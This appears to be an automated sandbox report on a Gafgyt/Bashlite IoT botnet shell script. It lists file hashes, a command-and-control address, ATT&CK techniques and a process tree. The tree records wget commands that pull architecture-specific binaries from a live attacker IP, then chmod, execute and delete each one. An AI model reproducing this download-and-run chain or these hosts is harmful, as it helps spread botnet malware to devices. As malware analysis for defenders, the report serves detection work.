gafgyt | ca881068a55c9fed005fa8d435627ba94cfc32c1b713bda857d4e3db269b64ed

Analysis

max time kernel
5s
max time network
11s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
30-12-2024 21:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gtop.sh
Size

2KB
MD5

86a38b2232fb245168b14b395a3a882b
SHA1

600efb77bf03419327d1830ca94863896c30a26e
SHA256

ca881068a55c9fed005fa8d435627ba94cfc32c1b713bda857d4e3db269b64ed
SHA512

0278f33ce19f28cd5d098e0b12b6a1acf30f73c8f6911a6f51d2150798040fec35e2e2ecdc005b85a8556e4652308c9fd36fec5beb2aab2355704054c3647ede

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

154.213.186.115:4444

Signatures

Detected Gafgyt variant 7 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
701	chmod
706	chmod
714	chmod
727	chmod
738	chmod
684	chmod
695	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/jackmymips	686	jackmymips
/tmp/jackmymips64	696	jackmymips64
/tmp/jackmymipsel	702	jackmymipsel
/tmp/jackmysh4	707	jackmysh4
/tmp/jackmyx86	715	jackmyx86
/tmp/jackmyi486	729	jackmyi486
/tmp/jackmyi586	739	jackmyi586

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
704	rm
686	jackmymips
689	rm
698	rm
702	jackmymipsel
664	wget
690	wget
696	jackmymips64
700	wget

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jackmyi486	wget
File opened for modification	/tmp/jackmyi586	wget
File opened for modification	/tmp/jackmymips	wget
File opened for modification	/tmp/jackmymips64	wget
File opened for modification	/tmp/jackmymipsel	wget
File opened for modification	/tmp/jackmysh4	wget
File opened for modification	/tmp/jackmyx86	wget

/tmp/gtop.sh
/tmp/gtop.sh
1⤵
PID:660
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmymips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:664
- /bin/chmod
  chmod +x jackmymips
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/jackmymips
  ./jackmymips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:686
- /bin/rm
  rm -rf jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:689
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmymips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:690
- /bin/chmod
  chmod +x jackmymips64
  2⤵
  - File and Directory Permissions Modification
  PID:695
- /tmp/jackmymips64
  ./jackmymips64
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:696
- /bin/rm
  rm -rf jackmymips64
  2⤵
  - System Network Configuration Discovery
  PID:698
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmymipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:700
- /bin/chmod
  chmod +x jackmymipsel
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/jackmymipsel
  ./jackmymipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:702
- /bin/rm
  rm -rf jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:704
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmysh4
  2⤵
  - Writes file to tmp directory
  PID:705
- /bin/chmod
  chmod +x jackmysh4
  2⤵
  - File and Directory Permissions Modification
  PID:706
- /tmp/jackmysh4
  ./jackmysh4
  2⤵
  - Executes dropped EXE
  PID:707
- /bin/rm
  rm -rf jackmysh4
  2⤵
  PID:709
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmyx86
  2⤵
  - Writes file to tmp directory
  PID:710
- /bin/chmod
  chmod +x jackmyx86
  2⤵
  - File and Directory Permissions Modification
  PID:714
- /tmp/jackmyx86
  ./jackmyx86
  2⤵
  - Executes dropped EXE
  PID:715
- /bin/rm
  rm -rf jackmyx86
  2⤵
  PID:718
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmyi486
  2⤵
  - Writes file to tmp directory
  PID:719
- /bin/chmod
  chmod +x jackmyi486
  2⤵
  - File and Directory Permissions Modification
  PID:727
- /tmp/jackmyi486
  ./jackmyi486
  2⤵
  - Executes dropped EXE
  PID:729
- /bin/rm
  rm -rf jackmyi486
  2⤵
  PID:731
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmyi586
  2⤵
  - Writes file to tmp directory
  PID:732
- /bin/chmod
  chmod +x jackmyi586
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/jackmyi586
  ./jackmyi586
  2⤵
  - Executes dropped EXE
  PID:739
- /bin/rm
  rm -rf jackmyi586
  2⤵
  PID:743
- /usr/bin/wget
  wget http://141.95.84.4:34585/jackmyi686
  2⤵
  PID:744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jackmyi486

Filesize
126KB

MD5
37bc4b1d4fce9500ee4fee154e61d9e6

SHA1
6fddc8858547e60672cca66857ceb7293638a057

SHA256
72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c

SHA512
3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb

Download Submit
/tmp/jackmyi586

Filesize
135KB

MD5
4ca387e1408f29f6ed1979acfb671f82

SHA1
3467879b5fd631a5884f947ba013d61ea8a33c91

SHA256
1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d

SHA512
18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738

Download Submit
/tmp/jackmymips

Filesize
199KB

MD5
f2ab2725ea6c883a5c608bc365c41fe5

SHA1
454d6983d9a7bb59aa0441b2c2cc805a97738e66

SHA256
531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d

SHA512
572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

Download Submit
/tmp/jackmymips64

Filesize
244KB

MD5
89655c0a64c3552ee71dc901a3561ad1

SHA1
8a488927882c18b5a35da06c6428f8707d4314ad

SHA256
08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04

SHA512
23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

Download Submit
/tmp/jackmymipsel

Filesize
199KB

MD5
caabd697c443462f0a04d6b30529df58

SHA1
4fcb97074d1971ebfa482aad5edf208b43b6d819

SHA256
5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf

SHA512
abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8

Download Submit
/tmp/jackmysh4

Filesize
146KB

MD5
2a8e0da501cea8f8d32893a5fd6c9aab

SHA1
29b2be373b4155632926b9656861bebd53264473

SHA256
17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1

SHA512
64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7

Download Submit
/tmp/jackmyx86

Filesize
156KB

MD5
afcb3a143b9f4e3a985c3eeb2e2ae4c8

SHA1
295f0e0380f71feb1c8911e29882db6a792bbd58

SHA256
fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c

SHA512
b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08

Download Submit